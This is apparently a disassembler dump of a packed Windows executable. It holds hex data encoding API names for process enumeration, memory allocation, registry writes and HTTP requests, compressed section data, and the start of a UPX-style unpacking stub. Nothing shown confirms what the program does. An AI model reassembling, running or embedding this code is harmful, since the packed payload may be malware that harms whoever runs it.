dd 656C64h, 65724301h, 54657461h, 686C6F6Fh, 33706C65h
dd 616E5332h, 6F687370h, 47010074h, 75437465h, 6E657272h
dd 6F725074h, 73736563h, 1006449h, 74737953h, 69546D65h
dd 6F54656Dh, 656C6946h, 656D6954h, 65470100h, 73795374h
dd 546D6574h, 656D69h, 74655301h, 6E657645h, 57010074h
dd 46746961h, 6953726Fh, 656C676Eh, 656A624Fh, 1007463h
dd 61657243h, 76456574h, 41746E65h, 65470100h, 63695474h
dd 756F436Bh, 100746Eh, 616D6E55h, 65695670h, 46664F77h
dd 656C69h, 70614D01h, 77656956h, 6946664Fh, 100656Ch
dd 61657243h, 69466574h, 614D656Ch, 6E697070h, 1004167h
dd 74726956h, 416C6175h, 636F6C6Ch, 69560100h, 61757472h
dd 6572466Ch, 4D010065h, 69746C75h, 65747942h, 69576F54h
dd 68436564h, 1007261h, 50746547h, 41636F72h, 65726464h
dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 65470100h
dd 72655674h, 6E6F6973h, 417845h, 64695701h, 61684365h
dd 4D6F5472h, 69746C75h, 65747942h, 6F430100h, 69467970h
dd 41656Ch, 65724301h, 44657461h, 63657269h, 79726F74h
dd 46010041h, 4C656572h, 61726269h, 1007972h, 61657243h
dd 754D6574h, 41786574h, 704F0100h, 754D6E65h, 41786574h
dd 65530100h, 72754374h, 746E6572h, 65726944h, 726F7463h
dd 1004179h, 53746547h, 65747379h, 7269446Dh, 6F746365h
dd 417972h, 74654701h, 7473614Ch, 6F727245h, 47010072h
dd 6F4D7465h, 656C7564h, 646E6148h, 41656Ch, 74654701h
dd 656D6954h, 656E6F5Ah, 6F666E49h, 74616D72h, 6E6F69h
dd 74654701h, 61636F4Ch, 6D69546Ch, 6C010065h, 63727473h
dd 4169706Dh, 72430100h, 65746165h, 65726854h, 1006461h
dd 43746547h, 65727275h, 7250746Eh, 7365636Fh, 52010073h
dd 61656C65h, 754D6573h, 786574h, 73655201h, 76457465h
dd 746E65h, 74654701h, 48647453h, 6C646E61h, 53010065h
dd 6E557465h, 646E6168h, 4564656Ch, 70656378h, 6E6F6974h
dd 746C6946h, 1007265h, 70616548h, 657A6953h, 65540100h
dd 6E696D72h, 50657461h, 65636F72h, 1007373h, 61427349h
dd 69725764h, 74506574h, 48010072h, 52706165h, 6C6C4165h
dd 100636Fh, 70616548h, 61657243h, 1006574h, 70616548h
dd 74736544h, 796F72h, 756C4601h, 69466873h, 7542656Ch
dd 72656666h, 53010073h, 6E457465h, 46664F64h, 656C69h
dd 646F4D01h, 33656C75h, 72694632h, 1007473h, 656C6544h
dd 72436574h, 63697469h, 65536C61h, 6F697463h, 4C01006Eh
dd 70614D43h, 69727453h, 57676Eh, 4D434C01h, 74537061h
dd 676E6972h, 56010041h, 75747269h, 75516C61h, 797265h
dd 69784501h, 6F725074h, 73736563h, 74520100h, 776E556Ch
dd 646E69h, 74654701h, 74737953h, 69546D65h, 7341656Dh
dd 656C6946h, 656D6954h, 65480100h, 6C417061h, 636F6Ch
dd 61654801h, 65724670h, 52010065h, 65736961h, 65637845h
dd 6F697470h, 4701006Eh, 74537465h, 75747261h, 666E4970h
dd 100416Fh, 43746547h, 616D6D6Fh, 694C646Eh, 41656Eh
dd 746E4501h, 72437265h, 63697469h, 65536C61h, 6F697463h
dd 4C01006Eh, 65766165h, 74697243h, 6C616369h, 74636553h
dd 6E6F69h, 65755101h, 65507972h, 726F6672h, 636E616Dh
dd 756F4365h, 7265746Eh, 65470100h, 646F4D74h, 46656C75h
dd 4E656C69h, 41656D61h, 6C540100h, 6C6C4173h, 100636Fh
dd 4C746553h, 45747361h, 726F7272h, 6C540100h, 65724673h
dd 54010065h, 6553736Ch, 6C615674h, 1006575h, 47736C54h
dd 61567465h, 65756Ch, 72695601h, 6C617574h, 746F7250h
dd 746365h, 74654701h, 74737953h, 6E496D65h, 6F66h, 0D1h
dd 23000h, 67655201h, 6D756E45h, 756C6156h, 1004165h, 43676552h
dd 74616572h, 79654B65h, 417845h, 67655201h, 736F6C43h
dd 79654B65h, 65520100h, 74655367h, 756C6156h, 41784565h
dd 65520100h, 65704F67h, 79654B6Eh, 417845h, 67655201h
dd 72657551h, 6C615679h, 78456575h, 52010041h, 75516765h
dd 49797265h, 4B6F666Eh, 417965h, 0DE00h, 231DC00h, 6E770100h
dd 69727073h, 4166746Eh, 0EA0000h, 31E40000h, 43010002h
dd 4C726168h, 7265776Fh, 46010041h, 57646E69h, 6F646E69h
dd 1004177h, 646E6946h, 646E6957h, 7845776Fh, 43010041h
dd 4E726168h, 41747865h, 73770100h, 6E697270h, 416674h
dd 6E655301h, 73654D64h, 65676173h, 0F5000041h, 0
dd 1000232h, 65746E49h, 74656E72h, 6E6E6F43h, 41746365h
dd 6E490100h, 6E726574h, 6C437465h, 4865736Fh, 6C646E61h
dd 48010065h, 53707474h, 52646E65h, 65757165h, 417473h
dd 746E4901h, 656E7265h, 74654774h, 6E6E6F43h, 65746365h
dd 61745364h, 1006574h, 65746E49h, 74656E72h, 6E65704Fh
dd 49010041h, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 74744801h, 65755170h, 6E497972h, 416F66h, 74744801h
dd 65704F70h, 7165526Eh, 74736575h, 1000041h, 24000001h
dd 0FF000232h, 7FF000Ah, 37FF00h, 0FF000EFFh, 74FF000Fh
dd 73FF00h, 0FF006FFFh, 2FF0008h, 0BFF00h, 0FF0070FFh
dd 0CFF0015h, 10FF00h, 0FF0017FFh, 4FF0009h, 3FF00h, 0FF0012FFh
dd 39FF0013h, 34FF00h, 0
dd offset dword_44C3A4+8C5Ch
dd 3014C00h, 580B600h, 45h, 0
dd 0F00E000h, 7010B01h, 230000Ah, 5A00000h, 0
dd 1A4F700h, 100000h, 2400000h, 40000000h, 2 dup(100000h)
dd 400h, 0
dd 400h, 0
dd 7E00000h, 100000h, 0
dd 200h, 0A0000000h, 100000h, 0A0000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 26D0000h, 8C00h, 8 dup(0)
dd 2429000h, 1C00h, 0Ah dup(0)
dd 2400000h, 28400h, 6 dup(0)
dd 65742E00h, 7478h, 226F300h, 100000h, 2300000h, 100000h
dd 3 dup(0)
dd 2000h, 64722E60h, 617461h, 394C00h, 2400000h, 400000h
dd 2400000h, 3 dup(0)
dd 4000h, 61642E40h, 6174h, 5578800h, 2800000h, 300000h
dd 2800000h, 3 dup(0)
dd 4000h, 7D000C0h, 2701000h, 7D8A500h, 7F701000h, 81701C79h
dd 0E11A6A4Bh, 3EFB7A3Bh, 11E3D0Eh, 0DF43C326h, 67913703h
dd 0BDDAFFFFh, 7341EA1Eh, 831E361Bh, 0C9376D37h, 0A6046349h
dd 813A4EBBh, 3FF0000h, 9F476A58h, 76624BEEh, 0B13C193Dh
dd 88E0FFFFh, 38863F78h, 6CEC2E0Bh, 1E42427Fh, 2F921B35h
dd 9FFFEC43h, 0D9304AFDh, 1776744Ah, 0C6234255h, 84372643h
dd 0F23A59ADh, 2700C565h, 0FEDFFFA5h, 0DB304040h, 5417002Fh
dd 43DF3146h, 87C00F67h, 0FFE4324Ah, 168FD5Fh, 2FF11F35h
dd 0FDD5745h, 0AC8D1748h, 4868002Bh, 0FFE1FF77h, 170EE613h
dd 306BAE3Ah, 2DDB2D41h, 4EA78E19h, 3F0DF53Ch, 0B136FFFCh
dd 0F5C05C71h, 292EB4D4h, 17121AB2h, 1E38D9h, 0C5E2FFEFh
dd 4BCE3783h, 0F7E99427h, 6AA07DE2h, 3245D75Ch, 0D2F1FFB1h
dd 0B77B67A3h, 3F00615Bh, 0B5418287h, 5BC62F2Fh, 7FFF3F3Fh
dd 391A2BFCh, 757F8D0Dh, 625560FFh, 23D22EFh, 2B02826Fh
dd 0FFFF7FE2h, 6E4CD5Bh, 0E83BAC72h, 909E5133h, 2C1D3F00h
dd 780F747Fh, 7C620A8Fh, 0FFFFFF6Eh, 3C1109AEh, 567163B2h
dd 6B4EE162h, 0BE9C013h, 0E036BB7Fh, 0CEB3766Dh, 0EDAB2E15h
dd 0FF8F1401h, 7C6620Fh, 0C42F58BAh, 33F3346h, 2FA92C11h
dd 7452DF5Fh, 12637C6Fh, 0D70E3E3Fh, 0FFFB0120h, 314E6016h
dd 0C2858DCh, 472BB989h, 32BEAFFFh, 7F63C68Eh, 380FD748h
dd 41657CECh, 6B40CC6Ch, 0FFD12040h, 2B162476h, 473E77A7h
dd 0AF2EC236h, 0FFE05BFFh, 0FE710871h, 7E11626Dh, 17AF5F80h
dd 0E30668Ah, 15138E63h, 29F67FFCh, 37C9DE06h, 5F7955E2h
dd 470FFF62h, 78E9B356h, 0FFFFC586h, 5727F836h, 3606FC3Fh
dd 5C7261E4h, 68099432h, 10B99314h, 0FB66AE63h, 0B42D0760h
dd 0C2AF971Eh, 30FE0B8Fh, 2C371758h, 2F913200h, 0C0BFEC6Ch
dd 0FDE76A80h, 9217614Ah, 0E7BF58ADh, 54847FFh, 7F60AE37h
dd 40FC6244h, 0BFD81D65h, 0BD85FF30h, 74EE0D0Bh, 62066AAAh
dd 9B6C5764h, 0F09A172Fh, 4D7FBFFFh, 253DEC7Ah, 1A9D6C1Ah
dd 0FCD25833h, 165F1Eh, 3FAB5611h, 6360B057h, 16EFCE2Dh
dd 96DF8144h, 0AF31439Fh, 61146C3Fh, 0FDFD7C4h, 3FB3F7BDh
dd 0C2751D1Fh, 0F063D1Fh, 697967E2h, 0E0C27F3Dh, 6AE3F65h
dd 29A736B1h, 0E23F47ADh, 1EFEFD3Fh, 46424CE7h, 2D497E66h
dd 3F15249Eh, 2C4E647Fh, 74FF8FECh, 0A62E97CEh, 2B47642Fh
dd 231D05DEh, 693D8767h, 260A3DFDh, 0F0F6EB4h, 4FC1DF62h
dd 6546E9FAh, 0D0FCE05h, 19033E3Ch, 0FFB06F3Bh, 6169DC1Eh
dd 1EA3237Fh, 0B03A1901h, 0BF0F106Eh, 30DFF477h, 4C0FCBAFh
dd 0DFA78819h, 2EAE1F1Dh, 0FF2D171Fh, 0A7BBFECAh, 1B0C5FDFh
dd 7E60AB3Bh, 2FB15FD0h, 0C123475Bh, 6BED60ACh, 0B7FF0F14h
dd 2606967Bh, 0EAE2FF86h, 0AFC2B71Dh, 0D7713F20h, 56F47DBh
dd 0E0FDE8C1h, 5F0AF0FFh, 6A2F1604h, 0C3204674h, 0E57274Ah
dd 8309310Bh, 0FFDFE95Fh, 36140256h, 5C657FAFh, 0C22E0F42h
dd 0C623112Fh, 9F271727h, 0A64AFEDEh, 0AB391929h, 1D39F66Bh
dd 2AA7C22Bh, 0DEDF07BAh, 1D2A267Fh, 7568B020h, 66563AD7h
dd 2F424271h, 4B97C22Fh, 373F821Fh, 0B8211925h, 0FF059707h
dd 0E28DDAFh, 1EAF0E07h, 0B8261428h, 364A726Eh, 0F2056C7h
dd 6E5D6F67h, 19277E63h, 17C7A92Ch, 0FE740F21h, 1F787A5Fh
dd 8EB61F20h, 27C22217h, 76B03D1Dh, 0DFED787Eh, 3D192FEEh
dd 4E626EA0h, 1EAF2642h, 61ABB72Eh, 0CB3FB375h, 0AB3D56FEh
dd 4F0F786Eh, 0B52E103Eh, 0C2971061h, 0DF9D9F05h, 7C37102Eh
dd 2FBF0010h, 97A62E0Ah, 0F0D1C7BFh, 6E6AAB22h, 6013F20h
dd 0EC210B17h, 50F08FF7h, 5E210DB6h, 0A7380A29h, 3F473E6Dh
dd 3EE29ECEh, 2C272201h, 203F3F0Eh, 7569C71Bh, 0C5C583B7h
dd 3FEE6C4Ah, 4663EF7Fh, 0EFB23F0Dh, 60FF783Fh, 3B425B62h
dd 0DEB73D11h, 6BA3F72Eh, 0C0210171h, 842AAF42h, 16EE01DFh
dd 3F37EC3Ah, 66B1572Ch, 0ECEA3775h, 1528E65Fh, 3E05A48Fh
dd 0AD4F16F4h, 6501CE6Ah, 49FF8B19h, 0C6C98DDBh, 43A72616h
dd 724AC16Ch, 1D672076h, 0B1EC62F0h, 0F75F3D6Ah, 1DF7163Eh
dd 1FBA7008h, 0CFF6F718h, 15FE15AEh, 0A6063F83h, 2E467162h
dd 56694C81h, 0FF161FFBh, 0AD271934h, 214C3E60h, 0AE2619CEh
dd 204A673Dh, 6406ED37h, 351A291Fh, 1B2956CFh, 0F62172Ah
dd 2B117D83h, 3D8787A3h, 8DFF6B1Fh, 3C192B7Ch, 205749B6h
dd 7CA32901h, 17E2FF64h, 9736704Eh, 21F6744Ah, 0E0A1FF1Dh
dd 626A87FFh, 1D72D4Dh, 0B6870469h, 69A4F72Ah, 812B5B79h
dd 0EFF0FCB1h, 96026341h, 0A1261539h, 0CA2C4767h, 0C36D385Bh
dd 6C8F8F0Dh, 0DE385F78h, 0F7177C66h, 3BF0D3E8h, 3A1F2A1Eh
dd 0D7A92A1Dh, 0F0172B43h, 0DF6C10C5h, 340E23BFh, 865B2701h
dd 21875357h, 0A777B7CFh, 0F0F7ECEFh, 717FF607h, 0C6CE2641h
dd 4B7C6FE9h, 11305777h, 0E56707Ch, 0C7260B2Ch, 15BFB126h
dd 6EA7E77Ch, 6E7EAF7Eh, 3F234663h, 83E186A9h, 76A338EFh
dd 77E25AFh, 77837F07h, 4073211Eh, 0A72B262Fh, 0FFA25EA7h
dd 0A8CE3763h, 15295F5Eh, 5F6DEC2Eh, 0EC1C6C9Fh, 3B0F1EC7h
dd 2E0C3E67h, 232E87B0h, 0EF5D9E23h, 695B1FAEh, 8C77676h
dd 0AF1E9D3Eh, 646A3FA7h, 0F6D5AF27h, 365C47B7h, 1F1F5DCAh
dd 1FFF837Fh, 1F7979DCh, 871F62C7h, 0ED3E5FA0h, 1171A638h
dd 0E018F6B3h, 0AB3AD837h, 73226EB7h, 0A054F4Ah, 2847A1D1h
dd 0F067C602h, 3FFC36D1h, 6860A02Ch, 1725E7F7h, 0F8A9413Bh
dd 37736FF6h, 2F774075h, 0E8837AFEh, 0C687EFADh, 0CE2ED721h
dd 0C5381D5Ch, 1E9A6FF6h, 319F1624h, 0D81936C4h, 4F5F0C2Fh
dd 2D2F776Eh, 0FF1777ADh, 0F77F07Fh, 426B670Dh, 749F244Ah
dd 5BA8C17h, 0E57BEE3Ch, 291D3F1Eh, 0FEDF47h, 304E6747h
dd 2AFF5CCBh, 75FF3F17h, 6C5D3B08h, 0BF3F07FFh, 571C6377h
dd 5F476E1Dh, 153CAF27h, 0B8471C0Bh, 13385FCFh, 37FEDF7Dh
dd 0AE6F8732h, 2C467760h, 66B547AFh, 0FFABDD7Eh, 0A339EE5Fh
dd 42417978h, 0B23A1D24h, 36275B5Fh, 7D16C3E1h, 4C4E200Fh
dd 7FB74F27h, 0E05E4E74h, 0CECFDAAFh, 69A7B72Bh, 0DE35577Fh
dd 85F02A16h, 3E3F013Eh, 57AA2C0Eh, 0FB41C635h, 27717DB6h
dd 7CB15721h, 40D7BF67h, 0FD6ED82Ch, 3E403C3Dh, 0E766B47Fh
dd 1C201631h, 746FB522h, 86F9FF8h, 6363AD20h, 1E2E4258h
dd 0A0FA7A7h, 1707C052h, 67B7A5E7h, 0E1BECC23h, 1FA37FDh
dd 5D77A71Ch, 4AC63440h, 5F5E1A17h, 0DD275F71h, 11287C5Fh
dd 57DC467Fh, 0FFA5811Fh, 0BFFFB68h, 0A77BF431h, 0E49D0E7Bh
dd 5B6BB6DEh, 47B26F66h, 5DC0355Ch, 0FFF10562h, 0BDCEFC0Ah
dd 16A12B53h, 6CB72BEEh, 0C12D4664h, 8313750Fh, 0FEC43CBBh
dd 38F23F7Ah, 909308FDh, 0A1C9F48Fh, 91F205F3h, 0A13C44ADh
dd 1E111F71h, 21570070h, 2C872F2Eh, 8760A9FEh, 0DB214640h
dd 613745Ah, 106FD378h, 0AB18378Fh, 0D020E69h, 0FC108C3Dh
dd 6CBFBDDBh, 67172623h, 635CDA2Dh, 9C103F76h, 0B34E08h
dd 2F00E037h, 0E274854h, 0BF670016h, 5F8BF817h, 0C27C0820h
dd 629D3897h, 2B471C60h, 0CAE9F8BFh, 671E60A7h, 2EC0274Bh
dd 7BB11001h, 0E2FC2A1Fh, 76244971h, 9D2B0E29h, 370035AFh
dd 705C1FC2h, 372725C6h, 10103E5Eh, 425C732Fh, 5602277Eh
dd 0B620F7AEh
dd 210D218Eh, 1BF03BEh, 3B270E8Fh, 193916AAh, 1E50A724h
dd 0BFAEA10Bh, 0C80F3742h, 67EB264Fh, 3F2E5F12h, 0A7455641h
dd 1FC09ED3h, 4E5F5340h, 3F3E4053h, 1609DE50h, 1F5841DAh
dd 3F45E45Fh, 4D34D3D8h, 0D0D406D3h, 0BBC4C8CCh, 0C04D3612h
dd 774660BCh, 69A60744h, 4898E59Ah, 888C9094h, 9A69A69Ah
dd 787C8084h, 0B34D7074h, 0B86C69B6h, 1E4D364Ch, 344C6806h
dd 4434D34Dh, 1C243038h, 0D34D84BAh, 4CFC0810h, 4AC0CD17h
dd 8F1E60h, 63DB5306h, 0D8071761h, 430B764Eh, 4363B591h
dd 20401E2h, 54CF0B08h, 1216A4E7h, 102202BEh, 2365ED6Bh
dd 800E1F10h, 80160802h, 0EF9A049Ch, 0A9020A3Dh, 1020F04h
dd 1B432410h, 701BF6Ah, 43243202h, 5040332h, 42D46D1Bh
dd 648FAFCFh, 6476190h, 90080707h, 9190641h, 5AA0B0Ah
dd 0D0C6419h, 46E96C01h, 4F63730h, 0CC96CCAh, 6685A386h
dd 1E787040h, 0A5B325CAh, 0C64E4F30h, 0C8B37152h, 0BF42A130h
dd 9CF61B37h, 0A80040A0h, 0FF9F1337h, 5A0841F7h, 7A71211h
dd 50A0609h, 0A70C040Bh, 3FE9835h, 10E020Dh, 0AF07000Fh
dd 1EC4AD9Eh, 0EF2F4040h, 99D9205Fh, 36CF407Ah, 18106B62h
dd 98CF6F22h, 5C603h, 1D497F94h, 0E7743800h, 0BF012A5Fh
dd 4DEA49h, 0F541EB71h, 0FB481B8h, 0F47C780h, 60B86A51h
dd 1471038h, 8088B187h, 100021Dh, 0F1C0C244h, 43AF2E9Eh
dd 0D807B1F7h, 0D44F0115h, 821F42ABh, 0A0396C3Dh, 7827185Ah
dd 41B742A5h, 43986008h, 112F0F3Fh, 0AE760006h, 0AD8F0FA8h
dd 55044781h, 6C54F487h, 8F0A90C0h, 1B142FAFh, 5F3F11B1h
dd 61460836h, 2018016Fh, 57100218h, 5C26E416h, 17021F4Ch
dd 0E0770918h, 7F090DE4h, 0C26E40Ch, 270C17BBh, 8B07170Ch
dd 37D8EC30h, 27167716h, 0B0BDA417h, 1126FF02h, 0C2E1206h
dd 21906C32h, 43411F35h, 8361B0D8h, 2F526750h, 1B0C0F53h
dd 0BF576C36h, 2F6CF759h, 69A6826Dh, 70061622h, 0D857721Ch
dd 61B0C10h, 8167805Fh, 320D860Fh, 833F826Ch, 8918F84h
dd 0E6273586h, 0A11F9E06h, 3618211Fh, 0A7DFA46Ch, 6C3FB72Fh
dd 0CEB0C838h, 718D73Fh, 786D917h, 59382722h, 0EC0E4742h
dd 0E6F826C1h, 74258E0h, 1C3E0E48h, 3369A60Eh, 57EC96FCh
dd 0EC83F42h, 9AD19C13h, 64189A60h, 1A0E3CC8h, 6D3704DAh
dd 0CC1B0E56h, 0A4D74256h, 0D69A1D0Eh, 0ED8ED74h, 79468E78h
dd 5B7ADC0Eh, 4EED32D9h, 0E9CFC0Eh, 5856085Bh, 0C0CE1EBCh
dd 0C076470Bh, 9019A404h, 8D961761h, 1901908h, 908F8E19h
dd 1901901h, 8629291h, 0C7939011h, 5E8A2C78h, 80B60F85h
dd 9580870Ah, 0A28606D2h, 30AA75Ch, 0CF97D8CDh, 0B445BE0Ch
dd 604010Bh, 0CCF0F9FCh, 6D34D30h, 0F7D0DCE4h, 50DAD34Ch
dd 6BC66C8h, 0DA69ACB4h, 0A45EF6B5h, 94069C0Eh, 7480061Eh
dd 0A69A69A6h, 54606468h, 5D607440h, 409349Bh, 8D0D627h
dd 86176A9Bh, 744C22Ch, 0CC3017Fh, 1A71C0Fh, 0A4950402h
dd 876F2790h, 7982607Dh, 0A62F2182h, 0A5A10FDFh, 0E46DEB81h
dd 0FCE09FE7h, 0A8807E40h, 0DAA3C15Eh, 21DB90A3h, 0FE816342h
dd 0D86D400Fh, 5FB56C10h, 5EB60F41h, 0FEC57BCFh, 0A2E4A2E8h
dd 0E8A2E53Fh, 7EBF5BA2h, 0FB5713A1h, 5513B77h, 0DA5EDA06h
dd 6ADA5FBFh, 0D35F32DAh, 0E82CFEC1h, 0BE0DED8h, 0FE817E31h
dd 9138E2Fh, 422A28F6h, 0B1709F07h, 4F966C41h, 6A0F62Fh
dd 5453507Ch, 7F44507Fh, 0A2F1D4B5h, 0AD3EAD40h, 0D18D56BFh
dd 3B861712h, 18746D06h, 972F5AA6h, 0F306C6FEh, 5E0AD36Dh
dd 630A0CEh, 67016D4Eh, 701BAAD1h, 6F770F3Ah, 0D0184447h
dd 0F2D306B4h, 34D088EEh, 4D067617h, 0AAAA216Ch, 19010816h
dd 95325555h, 0AA2AAA8Ch, 5155464Ah, 0C9A32555h, 0AA92AAA8h
dd 55555464h, 8CAA3255h, 4A192AAAh, 55955546h, 0A8AAA325h
dd 645192AAh, 55C95554h, 0AAAAAA32h, 4655192Ah, 258C9555h
dd 0AA4AAAA3h, 54555192h, 32A8C955h, 2A64AAAAh, 55555519h
dd 0A3AA8C95h, 92464AAAh, 55255551h, 0AAAAA8C9h, 195464AAh
dd 95325555h, 0AA2AAA8Ch, 5155464Ah, 0C9A32555h, 0AA92AAA8h
dd 55555464h, 8CAA3255h, 4A192AAAh, 55955546h, 0A8AAA325h
dd 645192AAh, 55C95554h, 0AAAAAA32h, 4655192Ah, 258C9555h
dd 0AA4AAAA3h, 54555192h, 32A8C955h, 2A64AAAAh, 55555519h
dd 0A3AA8C95h, 92464AAAh, 55255551h, 0AAAAA8C9h, 195464AAh
dd 95325555h, 0AA2AAA8Ch, 5155464Ah, 0C9A32555h, 0AA92AAA8h
dd 55555464h, 8CAA3255h, 4A192AAAh, 55955546h, 0A8AAA325h
dd 645192AAh, 55C95554h, 0AAAAAA32h, 4655192Ah, 258C9555h
dd 0AA4AAAA3h, 54555192h, 32A8C955h, 2A64AAAAh, 55555519h
dd 0A3AA8C95h, 92464AAAh, 55255551h, 0AAAAA8C9h, 195464AAh
dd 95325555h, 0AA2AAA8Ch, 5155464Ah, 0C9A32555h, 0AA92AAA8h
dd 55555464h, 8CAA3255h, 4A192AAAh, 55955546h, 0A8AAA325h
dd 645192AAh, 55C95554h, 0AAAAAA32h, 4655192Ah, 258C9555h
dd 0AA4AAAA3h, 54555192h, 32A8C955h, 2A64AAAAh, 55555519h
dd 0A3AA8C95h, 92464AAAh, 55255551h, 0AAAAA8C9h, 195464AAh
dd 95325555h, 0AA2AAA8Ch, 5155464Ah, 0C9A32555h, 0AA92AAA8h
dd 55555464h, 8CAA3255h, 4A192AAAh, 55955546h, 0A8AAA325h
dd 645192AAh, 55C95554h, 0AAAAAA32h, 4655192Ah, 258C9555h
dd 0AA4AAAA3h, 54555192h, 32A8C955h, 2A64AAAAh, 55555519h
dd 0A3AA8C95h, 92464AAAh, 55255551h, 0AAAAA8C9h, 195464AAh
dd 95325555h, 0AA2AAA8Ch, 5155464Ah, 0DFA32555h, 0C4902286h
dd 2302006h, 0BF7D0100h, 6E49FFF6h, 61697469h, 657A696Ch
dd 63127243h, 63655315h, 0FB6E6F0Fh, 35DFFFDBh, 69467411h
dd 6F50656Ch, 65746E69h, 42735472h, 6F436461h, 66FF2364h
dd 1B74D8F7h, 1B076552h, 454F5747h, 0FD50434Dh, 1366C377h
dd 33530F41h, 79546775h, 0F576570h, 1FA191DAh, 0DC6F4C41h
dd 6F660365h, 6DDC1B5Fh, 26166D1Fh, 6B396CDEh, 0EC837065h
dd 784564FDh, 67616863h, 7A1A3F65h, 4DEE0EECh, 642D4835h
dd 59751D1Dh, 1F61B739h, 766E45FCh, 6D6D7269h, 73CF6E65h
dd 657246E8h, 0B04B04B1h, 5F613165h, 182EC83Ch, 686E553Ah
dd 706520DFh, 3820CDEFh, 542B183Eh, 61496D09h, 7DC3BC1Eh
dd 79685417h, 7343211Bh, 0E0D96573h, 193B0B70h, 0C72C6C40h
dd 3A9DDB7Eh, 6C9C1649h, 6D63B373h, 0FD701370h, 79D9DD96h
dd 6737146Eh, 654E1579h, 63B87478h, 1C5D85DFh, 1F737207h
dd 617B0B53h, 77093617h, 6E278BA9h, 6E0F0C9Fh, 7D44A158h
dd 8ADF6576h, 64218177h, 6F295043h, 0F7B0BFD4h, 75E57986h
dd 336E2772h, 69725723h, 5BF0477h, 6F4D1547h, 0FD575B76h
dd 63D8383h, 44612BEDh, 0FB578A1Bh, 798F4C1Ch, 64498D41h
dd 0CEF8305Bh, 7A69539Eh, 17756495h, 0DA23233h, 11487863h
dd 2D4164AFh, 0FFBC3FD8h, 6C6F6F54h, 706C6568h, 70955347h
dd 746F6873h, 63FBE0ADh, 65176330h, 53AE7373h, 0C3961D79h
dd 6D65BFFEh, 646D6954h, 28B7121Dh, 31B4B3B0h, 6E7645C3h
dd 0A7E06172h, 469F3838h, 578A534Bh, 0B86A624Fh, 6698D905h
dd 6B7B43E5h, 0F1C22EFFh, 6DCF91D5h, 656956FFh, 2C554F77h
dd 0D668616h, 0FA3D8B1Dh, 7030B599h, 723F82ACh, 41917574h
dd 48F6066Ch, 921B6413h
dd 1D3CEF7Ah, 42573F06h, 7189C079h, 6C1F7043h, 0A257897Ah
dd 47646441h, 6E9C3FC3h, 670D1FABh, 7262694Ch, 70709B61h
dd 0A5561C7Ch, 0AE7C273h, 0F7CB6ED2h, 0A97816Dh, 5082C56Fh
dd 2137C32Ch, 0EC2C6E1Dh, 3D9DF206h, 1F638A75h, 4F9807EFh
dd 53176E13h, 0DB43997h, 4C299323h, 58AC561h, 6F5B456Fh
dd 1A85A17Dh, 85618C3Ch, 0A8655AF1h, 99A53D76h, 0C581611Fh
dd 0C568860Ah, 6969E72Bh, 4718AA53h, 2A6CD1E9h, 0B1BB82DEh
dd 731A6FE3h, 8904A8A3h, 887B4763h, 0F45AA933h, 708548AEh
dd 944E4701h, 7BC16900h, 0C17450DBh, 55C2E285h, 431883CBh
dd 6DDDE1BAh, 47634417h, 6C46986Fh, 0FE287675h, 42EE3530h
dd 46666675h, 0A510AAD3h, 0CF57F9E3h, 0DE035355h, 196F1D5Dh
dd 914CAD74h, 438E5DD8h, 1B57B374h, 0D7C58386h, 65755195h
dd 2569A378h, 707E8A1h, 77D56C74h, 0DD646E69h, 0D3583040h
dd 5A0F7341h, 0E9C38689h, 75207A2h, 680D397Dh, 618390C3h
dd 0C0F370CEh, 6F7C35C5h, 4C8A6D6Dh, 15459EBDh, 0FE6055BCh
dd 9B76A36Fh, 609B8A70h, 0ED075055h, 0C1F636Eh, 6521298Eh
dd 614E3C4Dh, 0F0431C6Dh, 754B078h, 0AFA5533Dh, 2E4B02D9h
dd 56321057h, 0C2175BFh, 47196E49h, 90D20733h, 89741CAAh
dd 442E6407h, 0D100E110h, 678B9EA8h, 0F66C8AFh, 6B6D757Dh
dd 4B951D41h, 20333265h, 784579ECh, 191EC621h, 0C6C69D81h
dd 574439DDh, 4B12CBBh, 0E82341BDh, 0DB78AD4Ah, 0DE00233Eh
dd 0F031DCEEh, 70736E77h, 7B66748Ah, 28A69D5Ah, 572E4EAh
dd 9D896377h, 5789815Dh, 0B4191D06h, 0AF65C066h, 77143A4Eh
dd 78AC168Dh, 4D414886h, 946761F8h, 0B8BBF500h, 32C40F09h
dd 686E3D02h, 0E070B6Eh, 7463F604h, 48F52341h, 1C1D8374h
dd 827074DCh, 73657167h, 0A71DB54Dh, 6B7747B4h, 35657414h
dd 83604229h, 0DA7D53FCh, 9A70536Dh, 581F41F5h, 0F05BCBBBh
dd 701255Eh, 0AFF3E24h, 2C370705h, 0E2CB2CBh, 6F73740Fh
dd 0B2B5E596h, 50B3A08h, 590C1570h, 10596596h, 3040917h
dd 65965884h, 34391312h, 0BF884349h, 74550EFh, 0B631014Ch
dd 71450580h, 2FB3B5E0h, 10F00FEh, 0A07010Bh, 5A000D8h
dd 0F4A4F727h, 6DAC2C10h, 24010B7h, 4061708h, 9D980F67h
dd 7796F6Dh, 80520037h, 0DA5BBC1Fh, 10D0F58h, 238C4B6Dh
dd 9946ABDEh, 1C4F4290h, 20B62BFBh, 2844E10h, 67E0BC3Dh
dd 50742EC2h, 226F301h, 0F8023021h, 3114225Bh, 2E600579h
dd 21866472h, 6179B868h, 40F73946h, 5ADF007h, 2E04D536h
dd 5788004Dh, 0D6DB62F8h, 303E805Eh, 0C04F0F00h, 924D000h
dd 103F7DF7h, 0D8A52F70h, 492A000Fh, 0FF92h, 3 dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
; FUNCTION CHUNK AT 0041A4F7 SIZE 0000019B BYTES
; FUNCTION CHUNK AT 0041A6BD SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0047FD5E SIZE 0000008A BYTES
; FUNCTION CHUNK AT 0047FDF0 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0047FDFD SIZE 000000B7 BYTES
; FUNCTION CHUNK AT 0047FEB5 SIZE 000000A1 BYTES
pusha
mov esi, offset dword_46C000
lea edi, [esi-6B000h]
push edi
or ebp, 0FFFFFFFFh
push esi
push edi
push edx
push ecx
jmp short loc_47FD5E
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_47FD26 proc near ; CODE XREF: start:loc_47FD5E�p
pop edi
xor edx, edx
sub edx, 0FFFFFFFCh
mov eax, edi
mov ecx, [eax]
mov esi, edi
loc_47FD35: ; CODE XREF: sub_47FD26+14�j
inc esi
mov ebx, [esi]
